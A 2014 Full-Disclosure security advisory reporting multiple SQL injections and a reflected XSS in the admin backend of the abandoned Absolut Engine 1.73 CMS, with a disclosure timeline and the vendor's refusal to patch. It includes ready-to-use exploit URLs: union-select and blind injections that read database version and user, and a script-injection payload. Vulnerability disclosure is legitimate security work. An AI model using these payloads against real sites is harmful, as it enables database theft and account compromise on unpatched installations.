lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <CALH-=7y-c4zZLyxZm2t5YZujGqPtFr80juP=rphhabnC-c0=uA@mail.gmail.com>
Date: Tue, 30 Dec 2014 06:50:25 +0100
From: Steffen Rösemann <steffen.roesemann1986@...il.com>
To: fulldisclosure@...lists.org
Subject: [FD] Multiple SQL Injections and Reflecting XSS in Absolut Engine
	v. 1.73 CMS

Advisory: Multiple SQL Injections and Reflecting XSS in Absolut Engine v.
1.73 CMS

Advisory ID: SROEADV-2014-08

Author: Steffen Rösemann

Affected Software: CMS Absolut Engine v. 1.73

Vendor URL: http://www.absolutengine.com/

Vendor Status: solved

CVE-ID: -


 ==========================

Vulnerability Description:

==========================


 The (not actively developed) CMS Absolut Engine v. 1.73 has multiple SQL
injection vulnerabilities and a XSS vulnerability in its administrative
backend.


 ==================

Technical Details:

==================


 The following PHP-Scripts are prone to SQL injections:


 *managersection.php (via sectionID parameter):*



*http://{TARGET}/admin/managersection.php?&username=admin&session=c8d7ebc95b9b1a72d3b54eb59bea56c7&sectionID=1*


 *Exploit Example:*



*http://{TARGET}/admin/managersection.php?&username=admin&session=c8d7ebc95b9b1a72d3b54eb59bea56c7&sectionID=1%27+and+1=2+union+select+1,version%28%29,3,4,5,6+--+*


 *edituser.php (via userID parameter):*



*http://{TARGET}/admin/edituser.php?username=admin&session=c8d7ebc95b9b1a72d3b54eb59bea56c7&userID=3*


 *Exploit Example:*



*http://{TARGET}/admin/edituser.php?username=admin&session=c8d7ebc95b9b1a72d3b54eb59bea56c7&userID=3%27+and+1=2+union+select+1,user%28%29,3,version%28%29,5,database%28%29,7,8,9+--+*



 *admin.php (via username parameter, BlindSQLInjection):*



*http://{TARGET}/admin/admin.php?username=admin&session=c8d7ebc95b9b1a72d3b54eb59bea56c7*


 *Exploit Example:*



*http://{TARGET}/admin/admin.php?username=admin%27+and+substring%28user%28%29,1,4%29=%27root%27+--+&session=c8d7ebc95b9b1a72d3b54eb59bea56c7*


 *managerrelated.php (via title parameter):*


 *http://{TARGET}/admin/managerrelated.php?username=user&session=ae29000d8570273c8917e874d029b336&articleID=0&title
<http://localhost/absolut/admin/managerrelated.php?username=user&session=ae29000d8570273c8917e874d029b336&articleID=0&title>={some_title}*


 *Exploit Example:*



*http://{TARGET}/admin/managerrelated.php?username=user&session=ae29000d8570273c8917e874d029b336&articleID=0&title={some_title}%27+and+1=2+union+select+1,version%28%29,3,4,5,6,7,8,9,10,11,12+--+*


 The last PHP-Script is as well vulnerable to a Reflecting XSS
vulnerability.


 *Exploit Example:*



*http://{TARGET}/admin/managerrelated.php?username=user&session=ae29000d8570273c8917e874d029b336&articleID=0&title=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E*


 Although this is a product which is not actively developed anymore, I
think it is worth mentioning as the idea (of the lists) are to keep
tracking (unknown) vulnerabilities in software products (but that is a
personally point of view).


 Moreover, this product is still in use by some sites (!) and it is offered
without a hint of its status.


 =========

Solution:

=========


 As the CMS is not actively developed, it shouldn't be used anymore.


 ====================

Disclosure Timeline:

====================

29-Dec-2014 – found the vulnerability

29-Dec-2014 - informed the developers

29-Dec-2014 – release date of this security advisory [without technical
details]

30-Dec-2014 – Vendor responded, won't patch vulnerabilities

30-Dec-2014 – release date of this security advisory

30-Dec-2014 – post on FullDisclosure



 ========

Credits:

========


 Vulnerability found and advisory written by Steffen Rösemann.


 ===========

References:

===========


 http://www.absolutengine.com/

http://sroesemann.blogspot.de

_______________________________________________
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ